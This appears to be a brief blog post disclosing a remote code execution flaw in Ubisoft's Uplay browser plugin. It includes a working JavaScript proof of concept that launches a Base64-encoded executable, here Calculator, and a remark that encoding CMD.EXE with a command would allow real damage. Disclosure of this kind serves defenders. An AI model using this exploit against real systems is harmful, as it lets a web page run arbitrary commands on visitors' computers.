Jul
30
Big Ubisoft Uplay exploit got found early this morning.
Pretty much, Uplay allows you to open games through a browser link, by installing a browser plugin. The plugin doesn’t have any protection, so you can basically run any command you want on the target computer, assuming they have a version of Uplay installed that wasn’t update today.
To test if your computer is vulnerable, click here. It’ll just open Calculator if you are vulnerable.
var x = document.createElement('OBJECT'); x.setAttribute("type", "application/x-uplaypc"); document.body.appendChild(x); x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")
“QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ==” when decoded (it’s Base64), gives “C:\WINDOWS\SYSTEM32\CALC.EXE.” Theoretically, you could encode C:\WINDOWS\SYSTEM32\CMD.EXE “SOME COMMAND HERE” and do some actual damage.
